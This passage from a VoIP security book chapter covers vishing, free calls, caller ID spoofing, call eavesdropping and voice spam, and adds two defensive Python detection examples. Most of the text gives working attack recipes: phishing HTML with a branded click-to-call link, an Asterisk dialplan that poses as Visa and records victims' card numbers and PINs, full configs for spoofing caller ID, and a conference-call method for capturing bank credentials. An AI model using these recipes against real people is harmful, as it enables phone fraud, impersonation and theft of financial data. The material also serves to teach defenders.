Oracle and SQL Server) and provide security protections appropriately. Also, VoIP network devices must be able to protect against server impersonation or redirection. Proper authentication and integrity checking are popular for client-to-server communication but should also be used for server-to-client verification as well as server to server.
Chapter 7. UNCONVENTIONAL VOIP SECURITY THREATS

In addition to protocol attacks on SIP, H.323, IAX, and RTP, as well as attacks against specific VoIP products, many unconventional attacks against VoIP networks can cause a lot of harm. For example, in the email world, a spam attack is neither sophisticated nor complex to perform; however, the headaches spam has brought to email users, from the nuisance of bulk email to phishing attacks, make spam a major issue for email users. This chapter will take a similar approach to VoIP by showing existing attacks that have the potential to be a major nuisance. The focus of this chapter will be how VoIP technologies, while very complex themselves, are still open to many simple attacks that can cause a lot of damage. When these minor flaws are applied to trusted entities, such as a user's telephone, they have the ability to trick users into doing things they normally would not do. When, for example, an email asks you to click a link and submit your personal information, most users are wise enough to ignore that request. However, what if users received an automated phone call purportedly from their credit card company's fraud detection services? Would users follow the directions in the message? Would they check if the 800 number provided in the message matches the one on the back of their credit card? This scenario, along with many others, is discussed in this chapter. The attacks shown in this chapter combine the weaknesses of VoIP networks, the ability to perform social engineering attacks on human beings, and the ability to abuse something we all feel is trustworthy (our telephone) to compromise VoIP end users. Specifically, the attacks shown in this chapter are the following:

VoIP phishing
Making free calls (in the United States and United Kingdom)
Caller ID spoofing
Anonymous eavesdropping/call redirection
Spam Over Internet Telephony (SPIT)
Before we begin this chapter's discussions, take a few moments to set up the necessary lab environment. Completing the following steps will ensure that the proof of concept attacks shown in this chapter will work correctly.

1. Load the Asterisk PBX.
a. Download the Asterisk PBX virtual machine (VoIPonCD-appliance) from http://www.voiponcd.com/downloads.php/.
b. Download VMware Player from http://www.vmware.com/products/free_virtualization.html/
c. Unzip VoIP-appliance.zip onto your hard drive.
d. Using VMware Player, load VoIPonCD.
2. Back up iax.conf, sip.conf, and extensions.conf on the Asterisk PBX system with the following commands:

$ cp /etc/asterisk/extensions.conf /etc/asterisk/extensions.original.conf
$ cp /etc/asterisk/sip.conf /etc/asterisk/sip.original.conf
$ cp /etc/asterisk/iax.conf /etc/asterisk/iax.original.conf

3. Configure the Asterisk PBX system.
a. Download iax.conf, sip.conf, and extensions.conf from http://labs.isecpartners.com/HackingVoIP/HackingVoIP.html/
b. Copy all three files to /etc/asterisk, overwriting the originals.
4. Restart the Asterisk PBX system with /etc/init.d/asterisk restart.
5. Download the SIP client X-Lite from http://www.xten.com/index.php?menu=download/ and the IAX client iaxComm from http://iaxclient.sourceforge.net/iaxcomm/.

Done! You now have a lab setting for this chapter.
VoIP Phishing

Phishing is nothing new to most computer users, as messages for Viagra, stock tips, or just a note from their favorite friend in Nigeria are received almost every day. Furthermore, anyone who owns a fax machine can also fall victim to a form of phishing. Who hasn't received unsolicited advertisements by fax (although this was made illegal by the Junk Fax Prevention Act of 2005)? Because of the success of phishers and the amount of money they "earn" for doing almost nothing, phishing is big business, and it's getting larger. In fact, email phishing is just another form of the junk mail and advertisements received in physical mailboxes every day. For anyone who owns a home, receiving two or three letters a day from mortgage companies offering an "unbelievable" interest rate is almost standard. VoIP phishing applies an old concept to a new technology. In most phishing emails, the target is asked to click a link, and doing so takes them to a bogus website that appears to be the legitimate one. For example, the user can be sent to a page that looks like the PayPal site but is actually a website controlled by an attacker. The bogus website will then ask the user for some type of information, such as a username, password, or some other user-specific information. Once attackers capture this information, they can then control the user's account without the user's knowledge. They are free to transfer money, trade stocks, or even sell users' social security information.
Spreading the Message
VoIP phishing, also known as vishing, takes the same concept as email phishing but replaces the fake website with a fake phone number or even phone destination. For example, email phishing attacks may ask you to go to www.visa.com to conduct business concerning your Visa credit card; however, while the text will show up as www.visa.com, the actual destination might be a malicious website controlled by an attacker: 123.234.254.253/steal/money/from/people.html. In VoIP phishing, attackers provide not the link to a malicious website but a legitimate-looking phone number, such as an 800, 888, or 866 number of the attackers' devising. Furthermore, to increase the appearance of validity with phone number buy-in services, attackers can attempt to buy an 800/888/866 number near the phone number block of the bank/institution they wish to impersonate. Given a direction or request to call an 800, 888, or 866 number, the end user may be more likely to trust it and make the telephone call. See Figure 7-1 for an example. In addition to listing a phone number, attackers can be more sophisticated and add a malicious VoIP call icon to the email message. For example, many VoIP clients, such as Skype, allow icons to be placed in email messages or websites to initiate outgoing VoIP calls. Furthermore, the VoIP call icon can contain the logo of the company the attacker wishes to impersonate. Once the user clicks the logo, he will automatically call the number controlled by the attacker while believing that he is really calling the actual number of his credit card company. See Figure 7-2.
Figure 7-1. VoIP phishing email
Notice that the message shown in Figure 7-2 contains a recognizable and seemingly trustworthy company logo, such as Visa's, as well as text that says "Call Fraud Detection Services immediately." A user who clicks the logo will automatically call a number of the attacker's choice, which, obviously, is not actually Visa's. The exploit can occur with any VoIP client; however, this particular example has been customized for Skype. The reason an attacker would use Skype versus a more vulnerable VoIP client is the same reason why email phishers are fond of PayPal: there are more than 7 million registered users!
Figure 7-2. VoIP phishing email with malicious VoIP call icon
Among 7 million registered Skype users, one of them is bound to click that trusted icon and make the dangerous call. The HTML code for the malicious VoIP icon in Figure 7-2 is shown here:
<a href="skype:+18881182006?call"><img src="http://attackers.ip.address/visa.jpg" style="border:none;"/></a>
Once the HTML file has been saved, it can be inserted as a signature file in the phisher's email client (in Microsoft Outlook, this is as simple as selecting Insert ► Signature ► Use this file as template ► Browse ► VoIP.Phish.Visa.htm). The phisher can send millions of emails, and each of them will have the malicious VoIP icon via the signature file. In the sample code, notice that the first item in bold is the attacker's 888 number. Because end users typically don't memorize the phone numbers of their credit card company, it would be difficult for an average person to determine if it is correct or not without checking the card itself, which many people will find too bothersome to do (especially if the user is worried about her account and wants to call the number as soon as possible). The second item shown in bold is the location of the Visa icon, which has been hosted on a server controlled by the attacker. End users who click the logo will then be taken to a phone/voicemail box controlled by the attacker, as shown in Figure 7-3.
Figure 7-3. Result of user's clicking VoIP call icon
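The two bold items the text calls out (a call-scheme link and a logo image wrapped inside it) are exactly what a mail gateway or phishing-report tool should look for. The following Python example is added here and is not from the book: it walks an HTML message body with the standard-library parser, collects every anchor whose href uses a click-to-call scheme (skype:, tel:, callto:, sip:, sips:), normalizes the number to digits, and reports those not on the organization's published contact list, noting when the anchor wraps an image since a branded logo is the lure described above. The sample message reuses the snippet from the text (its number and image host are the book's placeholders); the published-number list and the extra links are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample body modelled on the snippet in the text. The skype:
# number and image host are the book's placeholders, not real infrastructure.
SAMPLE_EMAIL_HTML = """
<p>Call Fraud Detection Services immediately.</p>
<a href="skype:+18881182006?call"><img src="http://attackers.ip.address/visa.jpg" style="border:none;"/></a>
<a href="https://www.example.com/help">Contact us</a>
<a href="tel:+1-800-555-0100">Card services</a>
"""

# Numbers the organization actually publishes (assumed value for this example).
PUBLISHED_NUMBERS = {"18005550100"}

# URI schemes that place a call when clicked.
CALL_SCHEMES = {"skype", "tel", "callto", "sip", "sips"}


def normalize_number(target: str) -> str:
    """Keep only digits so '+1-800-555-0100' and '18005550100' compare equal."""
    return re.sub(r"\D", "", target)


class CallLinkExtractor(HTMLParser):
    """Collect (scheme, raw target, wraps-an-image) for every call-scheme anchor."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._current = None  # anchor currently open, if it is a call link

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and attrs.get("href"):
            parts = urlsplit(attrs["href"])
            if parts.scheme.lower() in CALL_SCHEMES:
                self._current = {"scheme": parts.scheme.lower(),
                                 "target": parts.path, "image": False}
        elif tag == "img" and self._current is not None:
            # A logo inside a call link is the lure pattern from the text.
            self._current["image"] = True

    def handle_endtag(self, tag):
        if tag == "a" and self._current is not None:
            self.links.append(self._current)
            self._current = None


def suspicious_call_links(html: str, published_numbers):
    """Call-scheme links whose number is not one the organization publishes."""
    parser = CallLinkExtractor()
    parser.feed(html)
    parser.close()
    findings = []
    for link in parser.links:
        number = normalize_number(link["target"])
        if number not in published_numbers:
            findings.append({"scheme": link["scheme"], "number": number,
                             "target": link["target"], "image": link["image"]})
    return findings


if __name__ == "__main__":
    for finding in suspicious_call_links(SAMPLE_EMAIL_HTML, PUBLISHED_NUMBERS):
        flag = " (logo click-to-call)" if finding["image"] else ""
        print(f"{finding['scheme']}: {finding['number']}{flag}")
```

Rendering the number as plain digits next to the link in a user-facing warning ("this message would dial 1-888-118-2006") is usually enough to break the lure, because the whole attack depends on the user never seeing the number they are about to call.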
Receiving the Calls
In either of the scenarios just described, listing a phone number or providing a malicious VoIP call link, once the user makes the call, he will most likely enter a voicemail system that sounds exactly like the system of the intended target (the bank or credit card institution). After the user is prompted to enter his credit card number, PIN, and mother's maiden name for "verification" purposes by the automated system controlled by the attacker, the attacker has successfully carried out a VoIP phishing attack. The attacker needs to ensure that when the user arrives at the bogus destination, the voice answer system, such as the IVR, resembles very closely the real destination's voice answer system. For example, every phish site for Visa, MasterCard, PayPal, Bank of America, Charles Schwab, Fidelity, or any other financial institution closely mirrors the real website. If a user went to a PayPal site and saw something remotely different, such as a different login page, misspelling, or just a different sequence of events to access her information, she might be tipped off that the site is bogus. Similarly, VoIP phishers must ensure that the sequence of events, tone of voice, and prompts by the automated voice message service closely mirror those of the legitimate one. The bad news about this task is that it is fairly easy to accomplish. The Asterisk PBX is able to provide IVR services for users, and attackers can use this feature to create their own IVR system, ensure that it mirrors the "real" automated environment, and use it to answer calls. Asterisk is also able to auto-answer a phone number and provide an automated computer-generated voice in a variety of different tones. Furthermore, when users are prompted to enter their credit card number, PIN, or ZIP code, the attacker can set up an automated method to record this information with the Asterisk PBX, making the attack very simple and sustainable across a number of targets. Now that we have shown how to create a VoIP phishing email easily, let's show how the automated call system can be set up. In this example, we will phish users, posing as a credit card company. Just as real credit card companies do, we will ask the user to enter his credit card information for verification purposes, including the credit card number and the user's ZIP code and four-digit PIN. Unlike real credit card companies, though, after attackers have gained the information they want, the call will disconnect, an event that will be blamed on high call volume. Complete the following exercise to set up a mini IVR-like system on the internal phone extension 867.4474 (To-Phish) using Asterisk PBX. The example here will simply show how Asterisk can be used to automatically answer phone calls; use Swift, a text-to-speech program for Asterisk, to speak to the user; ask the user for information such as a credit card number; and record that information and save it as a file.
1. Log in to the Asterisk server.
2. Download Swift from http://www.mezzo.net/asterisk/app_swift.html/ and install it with the following commands:

tar -xzf app_swift-release.tgz
make install
load app_swift.so
3. Once Swift has been installed correctly, add the following text to extensions.conf (under the [test] realm):

[test]
exten => 8674474,1,Answer
exten => 8674474,2,Wait(2)
exten => 8674474,3,Monitor(wav,CreditCardPhish)
exten => 8674474,4,Swift(Welcome to Visa Credit Card Services)
exten => 8674474,5,Swift(Please enter your 16 digit credit card number)
exten => 8674474,6,Swift(Please enter your zip code)
exten => 8674474,7,Swift(Please enter your 3-digit pin code)
exten => 8674474,8,Swift(I'm sorry. Due to high call volume, the system cannot process your request. Please call again never)
exten => 8674474,9,Swift(goodbye)
exten => 8674474,10,Hangup
4. Next, using any phone registered to the Asterisk server, call 867.4474, as listed in the extensions.conf file.
5. When the system answers, type your credit card number, ZIP code, and three-digit PIN.
6. Once the information has been entered, Asterisk will record the information in two files located in /var/spool/asterisk/monitor: CreditCardPhish-in.wav for the input sounds and CreditCardPhish-out.wav for the output sounds. The recording process is controlled by line 3, where the Monitor option is used to record the call. All sounds and key tones entered during the call will be recorded.
7. Once users have completed their calls, log in to the Asterisk server and copy all the recordings to a Windows operating system.
8. Convert the key tones recorded in the .wav files to actual text, numbers, or symbols.
a. On the Windows operating system, download DTMF from http://www.polar-electric.com/DTMF/Index.html/. DTMF is a tool that takes telephone audio key tones and displays them as the text, numbers, or symbols they represent.
b. Open DTMF and play the .wav file recordings (CreditCardPhish-in.wav and CreditCardPhish-out.wav).
c. Once the audio has been played and heard by DTMF, it will display the text, as shown in Figure 7-4.

Figure 7-4. DTMF converts telephone key tones to text.

Done! After sending the VoIP phishing email, the attacker has recorded the information entered by the victim.
Making Free Calls

Making free calls from a PC to any landline or mobile phone in the United States or the United Kingdom is not really a security attack, but it is a nice little perk that will enable several other attacks in this chapter. For a few years, the major VoIP softphones have provided free PC-to-PC calling but charge for calls from PCs to landlines and mobile phones, such as SkypeOut. Using Asterisk PBX, the X-Lite soft client, and VoIPBuster, free calls from a PC to a landline phone are now possible (but only for US or UK phone numbers). Here's how you set it up:
1. Create a VoIP account with VoIPBuster (http://www.voipbuster.com/), download the VoIPBuster client, and create a username and password that will be used in SIP session setup.
2. Once an account with VoIPBuster has been set up, log in to the Asterisk server and change directories to the Asterisk folder with cd /etc/asterisk.
3. Open the sip.conf file in /etc/asterisk and add the following items at the end of the file. Make sure you replace the items in bold with your VoIPBuster username and password.
[voipbuster]
type=peer
host=sip.voipbuster.com
context=test
username=USERNAME
secret=PASSWORD
4. Open the extensions.conf file in /etc/asterisk and add the following items in the test realm ([test]). Make sure you replace the items in italic with the number you want to call via your SIP client. Our example will be calling the number 415.118.2006.
[test]
exten => 100,1,Dial(SIP/Sonia)
exten => 101,1,Dial(SIP/Raina)
exten => 14151182006,1,Dial(SIP/14151182006@voipbuster)
5. Using X-Lite or your favorite VoIP SIP client, point your VoIP softphone to the Asterisk server. If using X-Lite, complete the following steps:
a. Navigate to SIP Account Settings.
b. Select Properties.
c. Select the Account tab and enter your VoIPBuster username, VoIPBuster password, and domain (IP address of the Asterisk server).
6. Select OK and Close.

Done! By dialing 14151182006 on the X-Lite VoIP softphone on your PC, you will make a call from the Asterisk PBX on your local network to VoIPBuster, which will then route the call to the landline or mobile phone you have chosen. Also, this allows the use of Asterisk for internal PC-to-PC calls as well, such as extensions 100 and 101 in extensions.conf, which are local VoIP clients on the internal network. It should be noted that neither Asterisk nor X-Lite must be used with VoIPBuster, because it also has a thick client that can make free phone calls for you; however, if you have an Asterisk PBX system for your internal calling, it is nice that you can use the same PBX for both internal VoIP calls as well as external calls. In order to use VoIPBuster directly for external calls, simply download its client and use its client interface.
Caller ID Spoofing

Caller ID spoofing does exactly what its name implies: It changes the appearance of the source phone number of a telephone call. Caller ID spoofing can be innocent enough, allowing the kids who grew up with *69 to finally make phone calls and not feel bad about getting scared and hanging up at the last second; however, it can have many malicious applications as well. For example, the phone number of your bank can be spoofed, leading to another form of phishing attacks. Spoofing a bank number could allow attackers to call the phone number of everyone in the phone book and impersonate a trusted financial institution. Caller ID spoofing can also force someone to answer a call from someone he or she has been trying to avoid. The reason Caller ID spoofing is possible is that implicit trust is placed on the source entity (the caller) during a phone call. For example, when a phone call is made, the source device, such as a VoIP softphone, will send its source phone number to the destination as part of the data packet. Similar to how source IP addresses can be changed in TCP/IP headers, the source phone number can be changed by the outgoing device in a TCP/IP VoIP packet. In traditional phones, such as landlines or mobile devices, no user interface/option allows for this ability (for good reason); however, in the computer world, this is as simple as making a few edits to your softphone/VoIP packet and placing the call. Spoofing values in TCP/IP packets is nothing new and is simply carried over to VoIP data packets. There are many ways to spoof Caller ID, including specialized calling cards, online calling services, or simply downloading specific software. A quick Internet search will lead to many methods for spoofing Caller ID; we are going to show four specific examples. The first example, which is the simplest (five quick steps), uses IAX with an IAX client and VoIPJet (an IAX VoIP provider). For those who prefer SIP clients, the second example uses a SIP client, such as X-Lite, an Asterisk server, and VoIPJet. The third example uses an online service. Finally, the fourth example shows how to perform Caller ID spoofing on an internal VoIP network, such as a Cisco or Avaya hard phone with Asterisk. It should be noted that spoofing your Caller ID is now defined as pretexting, which is against the law and carries severe penalties (as noted by the 2006 Hewlett-Packard case).
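The root cause named above is that the provider or PBX takes the calling number from the device that sent it. The fix on the receiving side is to treat the presented number as a request rather than a fact: accept it only if it belongs to the account that authenticated, and otherwise substitute a number that account is entitled to. The following Python example is added here and is not from the book; it shows that policy as a trunk-side function, with number normalization so that the formatting variants in this chapter (415.118.2006, 14151182006, +1 415 118 2006) compare equal. The account-to-number table is a constructed assumption, and the numbers reuse the chapter's placeholder values.

```python
import re
from typing import Optional, Tuple

# Constructed assignment table: which calling numbers each authenticated
# account (a SIP or IAX peer) may present. Values reuse the chapter's
# placeholder numbers and are not real subscribers.
AUTHORIZED_NUMBERS = {
    "sonia": {"+14151182006"},
    "raina": {"+14151182007", "+14151182008"},
}


def normalize_e164(number: str, default_country: str = "1") -> Optional[str]:
    """Turn '415.118.2006', '(415) 118-2006', '14151182006' or
    '+1 415 118 2006' into '+14151182006'. Returns None when the digits do
    not form a plausible number for the default country."""
    digits = re.sub(r"\D", "", number)
    if number.strip().startswith("+"):
        pass  # already international; keep the digits as given
    elif len(digits) == 10:
        digits = default_country + digits  # national format, add country code
    elif len(digits) == 11 and digits.startswith(default_country):
        pass  # national format with country code already present
    else:
        return None
    if not 8 <= len(digits) <= 15:  # E.164 allows at most 15 digits
        return None
    return "+" + digits


def enforce_caller_id(peer: str, presented: Optional[str]) -> Tuple[Optional[str], str]:
    """Decide what caller ID to send onward for a call from an authenticated
    peer. Returns (number, reason): the presented number if the peer owns
    it, the peer's own number if it does not, or None if the peer has no
    number at all (the call should then be rejected, not sent anonymously)."""
    allowed = AUTHORIZED_NUMBERS.get(peer.lower(), set())
    if not allowed:
        return None, f"peer {peer} has no authorized caller ID; call rejected"
    wanted = normalize_e164(presented) if presented else None
    if wanted in allowed:
        return wanted, "accepted"
    fallback = sorted(allowed)[0]
    return fallback, f"peer {peer} presented {presented!r}, overridden with {fallback}"


if __name__ == "__main__":
    for peer, cid in (("Sonia", "415.118.2006"), ("Raina", "4151182006"), ("mallory", "4151182006")):
        number, why = enforce_caller_id(peer, cid)
        print(f"{peer}: {number} ({why})")
```

The override message is worth logging every time it fires: a peer that repeatedly presents numbers it does not own is either misconfigured or attempting exactly the spoofing this section describes, and that log line is the earliest place to notice it.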
Example 1
As noted previously, the reason Caller ID spoofing works with iaxComm and VoIPJet is that the information provided by the calling entity is trusted. iaxComm offers the ability to change one's Caller ID number, as noted in step 2 in the next exercise. Because VoIPJet is a VoIP provider, it is taking information from a softphone and converting that information to a PBX system for landline destinations. Because the softphone (iaxComm) is not connecting directly to a PBX system, VoIPJet has no choice but simply to trust the information it receives in the TCP/IP VoIP packets. In this case, iaxComm is modifying the information before it is sent over the network, forcing VoIPJet and the final destination to display the spoofed number. For this spoofing example, we will need to set up a VoIPJet account to spoof our Caller ID and an IAX client, such as iaxComm.
1. Download iaxComm from http://iaxclient.sourceforge.net/iaxcomm/.
2. Create a VoIPJet account by visiting http://www.voipjet.com/. The account grants you 25 cents' worth of calls for free.
3. Once a VoIPJet account has been set up, you will see an option called Click here to view instructions on setting up Asterisk to send calls to VoIPJet. Select that option and note the information to be used, as shown in Figure 7-5.
Figure 7-5. VoIPJet account information
4. Open iaxComm and with the following steps configure it to use VoIPJet:
a. Select Options from the menu bar.
b. Select Preferences and then the Caller ID tab.
c. On the Number line, enter the Caller ID number you wish to spoof from. See Figure 7-6. For this example, we will use 4151182006.
Figure 7-6. Caller ID tab in iaxComm
d. Select Apply ► Save ► Done. (Exit the menu by clicking the X in the upper right corner.)
e. Select Options from the menu bar.
f. Select Accounts.
g. Select Add.
h. Enter the VoIP information received from VoIPJet in Figure 7-5: Account Name (VoIPJet), Host (test.voipjet.com), Username (15193), Password (7f5db6951fabfaa4).
i. Select Save, exit the menu, and then select Done.
Done! You have now registered your iaxComm client to VoIPJet. The next step is to dial any ten-digit phone number, beginning with the number 1 (e.g., 14158675309). Type the number in the Extension text box on iaxComm. Once the call takes place, the Caller ID number set in the Preferences section of the client will appear on the remote phone.
Example 2
In order to spoof Caller ID using a SIP client, you must use an Asterisk PBX system with the VoIPJet account. Complete the following steps to spoof Caller ID by connecting the X-Lite SIP client to an Asterisk server and connecting the Asterisk server to VoIPJet.
1. Create a VoIPJet account by visiting http://www.voipjet.com/. The account grants you 25 cents' worth of calls for free.
2. Once an account with VoIPJet has been set up, you will see an option called Click here to view instructions on setting up Asterisk to send calls to VoIPJet. Select that option and note the information to be used in the iax.conf and extensions.conf files, as shown previously in Figure 7-5.
3. Change directories to the Asterisk folder with the command cd /etc/asterisk.
4. Copy the IAX information given to you by VoIPJet directly into the iax.conf file. Notice that the information from VoIPJet, shown in Figure 7-5, mirrors the items added to the iax.conf file. Also, you will probably have to log out and then log back in to get the MD5 checksum needed on the secret= line. Here is an example of the information entered into iax.conf:
[voipjet]
type=peer
host=test.voipjet.com
username=15193
secret=7f5db6951fabfaa4
auth=md5
context=default
5. Copy the extension information given to you by VoIPJet directly into the extensions.conf file under the test realm ([test]). Unlike iax.conf, you don't need everything given to you by VoIPJet to complete the proof of concept in this example, just the lines shown below. Additionally, make sure you replace the items in bold with the phone number you wish to spoof from. For this example, we will be spoofing from 415.118.2006 to any 10-digit number that is dialed with a prefix of 1 (as shown by the _1NXXNXXXXXX line):
exten => _1NXXNXXXXXX,1,SetCallerID(4151182006)
exten => _1NXXNXXXXXX,2,Dial(IAX2/15193@voipjet/${EXTEN})
exten => _011.,1,SetCallerID(4151182006)
exten => _011.,2,Dial(IAX2/15193@voipjet/${EXTEN})
6. Using a SIP client, such as X-Lite, between your client and the Asterisk server requires an extra step. Open the sip.conf file and enter the following information, which will specify a SIP client to register with your Asterisk server:
[Sonia]
type=friend
host=dynamic
username=Sonia
secret=123voiptest
context=default
7. Using X-Lite or your favorite VoIP SIP client, point your VoIP softphone to the Asterisk server. If using X-Lite, complete the following steps:
a. Navigate to SIP Account Settings.
b. Select Properties.
c. Select the Account tab and enter the Username (Sonia), Password (123voiptest), and Domain (IP address of the Asterisk server).
d. Select OK and Close.
Done! You have now registered your Asterisk server to VoIPJet (using IAX) and your X-Lite client to the Asterisk server (using SIP). The next step is to dial any 10-digit phone number, beginning with the number 1 (e.g., 14158675309), on the X-Lite SIP client. The Caller ID information will be retrieved from extensions.conf (item in bold in step 5) on the Asterisk server. Once the call takes place, the number after the SetCallerID line will appear on the remote phone.
Example 3
The next method of spoofing your Caller ID is quite simple. As stated previously, there are many methods of spoofing a Caller ID, including the use of services provided on websites like http://www.fakecaller.com/. By the time this book is released, this link might no longer work, but there are probably ten more just like it. Regardless, while fakecaller.com allows you to spoof Caller ID, it allows you only to insert text to repeat back to the user. Actual conversations cannot take place using this service; however, the proof of concept is demonstrated well with the website. Complete the following steps to spoof your Caller ID with fakecaller.com. Note that the service sends call information to a third party.
1. Visit http://www.fakecaller.com/.
2. Type the number you wish to call in the Number to dial text box.
3. Type the spoofed number, such as 4158675309, in the Number to display on Caller ID text box.
4. Type the name, such as Hackme Amadeus, in the Name on Caller ID text box. Note that this may not be displayed.
5. Select the type of Voice, male or female and age, for the call.
6. Select the message you wish to repeat when the target picks up the phone, such as "I'm Rick James, bitch!"
7. Select Make the call.

Done! In a few seconds, the number shown in step 2 will receive a call, appearing from the number in step 3. The text shown in step 6 will be spoken to the user.
Example 4
The next method of spoofing your Caller ID targets an internal network using VoIP with SIP. For example, you may want to spoof your Caller ID with outbound calls not to landlines or mobile phones but rather to your cubicle-mate sitting right next to you. If the environment uses Cisco or Avaya hard phones that are SIP-enabled, spoofing the Caller ID on an internal VoIP network is also possible. Complete the following steps to spoof your Caller ID on your internal VoIP network. The targeted phone extension is 2222, the real phone extension is 1111, and the spoofed phone extension is 1108. Asterisk will be used to mimic the setup between the hard phone sitting on your desk and the Cisco CallManager or Avaya Call Server. A soft client will also be used to connect to the Asterisk server to execute the spoofing.
1. Unplug the Ethernet jack from the hard phone on your desk.
2. On your Asterisk server, open the sip.conf file and enter the username and password information for your real phone extension. This will enable the Asterisk server to register to Cisco CallManager or Avaya Call Server, instead of to the hard phone on your desk. Note that the spoofer's real phone extension, passcode, and the spoofed number all need to be entered correctly, as shown in the bold text. For example, if the VoIP phone on the desk has the extension number of 1111 and the passcode is 1111, then those values must be entered in this file, as well as the extension you wish to spoof from (in the callerid line):
[Spoof]
type=friend
host=dynamic
username=1111
secret=1111
context=default
callerid=1108
3. On your Asterisk server, open the sip.conf file and enter the following information, which will enable a SIP client (such as X-Lite) to register with your Asterisk server:
[Sonia]
type=friend
host=dynamic
username=Sonia
secret=123voiptest
context=default
4. Edit the extensions.conf file and add the following information under the test realm ([test]). Notice that when extension 2222 is dialed, the Caller ID value will be set to 1108, as noted in the first line here.
exten => 2222,1,SetCallerID(1108)
exten => 2222,2,Dial(SIP/1112@Spoof/${EXTEN})
5. Using X-Lite or your favorite VoIP SIP client, point your VoIP softphone to the Asterisk server. If you're using X-Lite, complete the following steps:
a. Navigate to SIP Account Settings.
b. Select Properties.
c. Select the Account tab and enter the Username (Sonia), Password (123voiptest), and Domain (IP address of the Asterisk server).
d. Select OK and Close.
Done! You have now registered your Asterisk server to Cisco CallManager or Avaya Call Server and your X-Lite client to the Asterisk server (using SIP). The next step is to dial the four-digit phone extension of 2222 on the X-Lite SIP client. The Caller ID information will be retrieved from extensions.conf (items in bold in steps 2 and 3) from the Asterisk server. Once the call has been placed, the number after the CallerID and/or the SetCallerID line will appear on the remote phone. As you can see, Caller ID spoofing is quite simple, no matter which of the four demonstrated methods is used. The ability to spoof Caller ID has more impact than a practical joke or to subvert *69, however. For example, credit card companies often send new credit cards in the mail and require users to use their home phone number to activate the card. An angry neighbor, perhaps one who has cleaned up after the neighbor's cat or is tired of listening to dogs barking all night, can steal her neighbor's mail and activate a credit card by spoofing the Caller ID she is calling from. Another attack involves listening to someone else's voicemail from his mobile phone. In order to listen to voicemail on their mobile phones, most users select the phone's voicemail icon. This action actually calls their own number, which puts them into the voicemail system. Often, users do not use a password on their account, thinking that the voicemail box can be accessed only by someone holding the physical phone. If the user has made this mistake, an attacker can spoof the user's Caller ID, call the mobile phone, and get direct access to the target's voicemail system without being prompted for a password.
Anonymous Eavesdropping and Call Redirection

Man-in-the-middle attacks have plagued networks for many years. Tools from Dsniff/fragrouter to Cain & Abel help show how network communication methods are not secure. Using the same model, telephone communication via VoIP falls into the same problem space. While Layer 2 man-in-the-middle attacks using ARP packets are by far the easiest way to eavesdrop on a call, access to the correct network segment is required. Unfortunately, there are a few ways to eavesdrop without using ARP poisoning: using common phishing attacks in combination with call redirection.

The first kind of this attack is a targeted attack involving Caller ID spoofing. The attacker essentially creates a three-way call between the credit card company and the target, staying on the line as a passive listener and recording the content. The attacker spoofs his Caller ID number as the one listed on the back of a credit card or on the credit card company's website. Once the number has been spoofed, the attacker calls the target on one connection. The target, believing that the call is coming from the credit card company, answers the call thinking it is a trusted entity. Once the target answers the call, the attacker can play an automated computer voice informing him of supposed unusual activity on his account and asking him to verify his information. While the message is playing to the target on one connection, the attacker opens another connection with the real credit card company. Once the credit card company answers the call, the attacker connects (three-way call or conference) both the target and the credit card company while remaining on the line. Before doing anything else, most credit card companies use an automated computer voice to verify credit card numbers. Once the conference has been enabled, the target is asked by the real credit card company to verify his information by typing or speaking his credit card number, PIN, and the card's expiration date. The attacker secretly remains on the call and records all the information. Complete the following steps to perform this attack using X-Lite.

1. Instead of repeating steps, complete steps 1 through 8 from "Example 2" earlier in this chapter; however, in step 5, replace 4151182006 with the number on the back of your credit card.

2. Open X-Lite and select the AC button, which should then turn yellow and show text that states Auto-conference enabled. This button will automatically create a conference between the two lines used by X-Lite.

3. Using line 1 on X-Lite, call the target. This call will use the Caller ID value from step 5 in the earlier section. When the target answers the phone, play a pre-recorded audio file that states, "This is an automated message. We have noticed unusual activity in your account. Please remain on the line to verify your information." A poor man's approach to recording the message is to use Windows Narrator, which is described in detail in the next section of this chapter.

4. Using line 2 on X-Lite, call the credit card company. Once the credit card company picks up the call, X-Lite immediately conferences all the lines together (the Auto-Conference option was enabled in step 2). The target will then be listening to the real credit card company and be prompted for verification information.

5. On X-Lite, click the Record button. All information from the target to the credit card company will now be recorded by the attacker and can be used to compromise the target's account.

The second method of performing this attack takes not a targeted approach but a wider approach to its target. This attack was first mentioned by Jay Shulman at Black Hat 2006.

The attacker sends a phishing email similar to the one shown previously in this chapter. When an end user calls the number shown in the phishing email, the attacker opens a second connection to the actual credit card company. Instead of answering the call directly, the attacker connects the end user with the real credit card company; however, the attacker remains on the line. When the user is asked by the credit card company to verify her information by entering or speaking her credit card number, PIN, and the card's expiration date, the attacker, having remained on the call, captures the information.
Spam Over Internet Telephony

Remember the old days when you could just select and delete all the spam messages in your inbox? How about when you could just go to your Junk email folder and delete its contents with one click? Now think of having more than a hundred voicemail messages (or the maximum capacity of your voicemail box) on your mobile phone. Could you delete all of them with just a few clicks on your phone? Furthermore, what would you do when legitimate callers who are trying to leave you a message are not able to, such as "My flight from O'Hare got canceled because someone saw a cloud 400 miles away from the airport, so pick me up from SJC at 9 PM instead of SFO at 5 PM"? How disruptive would these issues be to your life compared with the 300 email messages from the Crown Prince of Nigeria?

The idea of SPIT is nothing new, as telemarketers already use automated technology to call home users to sell products and goods. Furthermore, many organizations will provide this service for a small charge, such as http://www.call-em-all.com/, which allows a spammer to send more than 1,000 people a pre-recorded voicemail for under $100. However, with VoIP, not only can hundreds of pre-recorded messages be sent out to any phone or voicemail system in the country, these messages can also be free and hard to trace, which makes the National Do Not Call Registry a lesser mitigation strategy. While everyone loves their favorite Republican, Democrat, or independent political candidate calling them on Election Day, would they enjoy receiving those messages every day from an anonymous seller?

In actuality, an anonymous spammer may be better than what could be done with the true abuse of SPIT. For financial gain, an attacker could mimic the automated fraud detection service that credit card companies often use. When the credit card company detects an unusual charge, an automated voice call is placed to the phone number listed for the account holder. The message usually tells the account holder that some aberrant activity has been detected and he should call the credit card company right away. However, an attacker can create a similar fraud detection voice call but ask the person to call a number of her choice. For example, the attacker's automated message could be: "Hello, this is an automated message from Visa Fraud Detection Services. We have noticed unusual activity in your account and ask that you call 1.800.118.2006 immediately to resolve this issue. This message will now repeat. Hello, this is an automated message from Visa Fraud Detection Services. We have noticed unusual activity in your account and ask that you call 1.800.118.2006 immediately to resolve this issue. Thank you."

The following sections show a few ways to perform SPIT.
SPIT and the City

